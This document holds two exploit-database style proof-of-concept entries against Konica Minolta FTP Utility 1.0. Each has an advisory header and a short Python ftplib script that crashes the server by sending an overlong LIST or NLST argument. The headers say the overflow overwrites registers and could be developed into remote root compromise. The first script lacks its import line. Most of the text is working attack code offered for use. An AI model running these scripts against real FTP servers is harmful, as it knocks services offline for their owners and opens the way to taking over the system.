# Exploit Title: Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) v2
# Date: [05-16-2020]
# Found by: Alvaro J. Gene (Socket_0x03)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www (dot) teraexe (dot) com
# Vulnerable Application: Konica Minolta FTP Utility
# Version: 1.0
# Server: FTP Server
# Vulnerable Command: LIST
# Tested on: Windows 7 SP1
# Impact: There is a buffer overflow vulnerability in the LIST command of the FTP server
# "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers, 
# such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite 
# some registers, an individual can use the vulnerable command to build a remote buffer 
# overflow exploit that will root a system without any user interaction. 

ftp = FTP('')

buffer = "A" * 1500


ftp.retrlines('LIST ' + buffer)

# Exploit Title: Konica Minolta FTP Utility v1.0 - 'NLST' Denial of Service (PoC) v2
# Date: [05-16-2020]
# Found by: Alvaro J. Gene (Socket_0x03)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www (dot) teraexe (dot) com
# Vulnerable Application: Konica Minolta FTP Utility
# Version: 1.0
# Server: FTP Server
# Vulnerable Command: NLST
# Tested on: Windows 7 SP1
# Impact: There is a buffer overflow vulnerability in the NLST command of the FTP server
# "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers, 
# such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite 
# some registers, an individual can use the vulnerable command to build a remote buffer 
# overflow exploit that will root a system without any user interaction. 

from ftplib import FTP

ftp = FTP('')

buffer = "A" * 1500


ftp.retrlines('NLST ' + buffer)